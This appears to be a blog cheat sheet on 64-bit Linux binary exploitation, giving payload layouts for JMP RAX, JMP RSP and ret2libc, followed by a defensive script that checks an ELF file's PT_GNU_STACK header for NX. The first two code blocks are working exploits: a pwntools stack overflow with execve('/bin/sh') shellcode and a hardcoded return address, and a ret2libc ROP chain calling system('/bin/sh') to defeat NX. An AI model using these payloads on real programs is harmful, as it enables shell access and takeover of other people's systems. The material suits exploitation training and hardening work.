# X64 Exploit concepts

## JMP RAX
Final Exploit - `nops + shellcode + JUNK + JMP RAX`

## JMP RSP - use when there is not enough space for the shellcode before the saved return address (RIP slot).
Final Exploit - `JUNK + JMP RSP + nops + shellcode`

## 64-bit NX enabled RET2LIBC
Final Exploit - `JUNK + RET + POP RDI; RET + /bin/sh + system + exit`
## Simple BOF

```python
from pwn import *

nops = b"\x90" * 30
# 27-byte execve("/bin/sh") shellcode from the page; it must be a bytes literal,
# otherwise concatenating it with the bytes NOP sled raises a TypeError
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

buffer = b"A" * (256 - len(nops) - len(shellcode))  # fill the rest of the 256-byte buffer
buffer += b"B" * 8                                  # saved RBP
buffer += p64(0x7fffffffdc98)  # saved RIP -> somewhere inside the NOP sled (fixed stack address, only valid with ASLR disabled)
payload = nops + shellcode + buffer

# Launch the vulnerable program and feed it the payload as argv[1]
p = process(['./vuln', payload])
p.interactive()
```
## NX/DEP Bypass - RET2LIBC

```python
# Final Exploit - `JUNK + RET + POP RDI; RET + /bin/sh + system + exit`
import sys
from struct import pack

libc_base = 0x00007ffff79e2000  # fixed libc base: only valid with ASLR disabled

buffer = b"A" * 256
buffer += b"B" * 8                                    # saved RBP
buffer += pack("<Q", libc_base + 0x00000000000008aa)  # RET gadget: keeps the stack 16-byte aligned before the call
buffer += pack("<Q", libc_base + 0x0000000000086388)  # RIP - pop rdi; ret
buffer += pack("<Q", libc_base + 0x001b3d88)          # "/bin/sh" string address, popped into RDI
buffer += pack("<Q", 0x7ffff7a31420)                  # system address
buffer += pack("<Q", 0x7ffff7a25110)                  # exit address (return address for system)

# Write the raw bytes; print() would emit the b'...' repr, which is not a usable payload
sys.stdout.buffer.write(buffer)
```
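The RET2LIBC section assumes the target has NX enabled. Whether that is actually the case is recorded in the ELF itself: the loader marks the stack non-executable when the binary carries a `PT_GNU_STACK` program header without the `PF_X` flag, and a binary with no such header falls back to an executable stack on x86 (which checksec-style tools report as NX disabled). The checker below is an added example written for this page, not code from the original cheat sheet; it parses the ELF64 header and program headers directly with `struct`, and builds two minimal, constructed ELF images inline so it can be run without any binary on disk. Pass a real file path as the first argument to check an existing binary.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header type that describes stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def nx_enabled(elf_bytes: bytes) -> bool:
    """Return True if an ELF64 image marks its stack non-executable.

    NX is signalled by a PT_GNU_STACK header whose flags lack PF_X.
    A missing PT_GNU_STACK header is reported as NX disabled, matching the
    executable-stack fallback the kernel applies on x86.
    """
    if elf_bytes[:4] != b"\x7fELF" or elf_bytes[4] != 2:  # EI_CLASS 2 == ELFCLASS64
        raise ValueError("not an ELF64 file")
    # ELF64 header: e_phoff at 0x20 (8 bytes), e_phentsize at 0x36, e_phnum at 0x38 (2 bytes each)
    e_phoff = struct.unpack_from("<Q", elf_bytes, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf_bytes, 0x36)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from("<II", elf_bytes, off)  # p_type, p_flags lead Elf64_Phdr
        if p_type == PT_GNU_STACK:
            return not (p_flags & PF_X)
    return False


def build_minimal_elf(stack_flags: int) -> bytes:
    """Constructed fixture: a 64-byte ELF64 header followed by one PT_GNU_STACK program header.

    Not loadable (no PT_LOAD, no code); it only exercises the header parsing above.
    """
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS64, little-endian, EV_CURRENT
    ehdr = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        2,    # e_type      ET_EXEC
        62,   # e_machine   EM_X86_64
        1,    # e_version
        0,    # e_entry
        64,   # e_phoff     program headers start right after the header
        0,    # e_shoff
        0,    # e_flags
        64,   # e_ehsize
        56,   # e_phentsize sizeof(Elf64_Phdr)
        1,    # e_phnum
        64,   # e_shentsize
        0,    # e_shnum
        0,    # e_shstrndx
    )
    # Elf64_Phdr: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


def check_file(path: str) -> bool:
    with open(path, "rb") as f:
        return nx_enabled(f.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(f"{sys.argv[1]}: NX {'enabled' if check_file(sys.argv[1]) else 'disabled'}")
    else:
        # Constructed images: RW stack (hardened) versus RWX stack (executable)
        print("RW  stack:", nx_enabled(build_minimal_elf(PF_R | PF_W)))
        print("RWX stack:", nx_enabled(build_minimal_elf(PF_R | PF_W | PF_X)))
```

The `-z noexecstack` / `-z execstack` linker options set exactly this header, so a build pipeline can run the check as a regression test: any binary for which `nx_enabled` returns `False` has lost the mitigation the RET2LIBC section is written to bypass.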
Article source: https://www.hackingdream.net/2023/05/64-bit-binary-exploitation-cheatsheet.html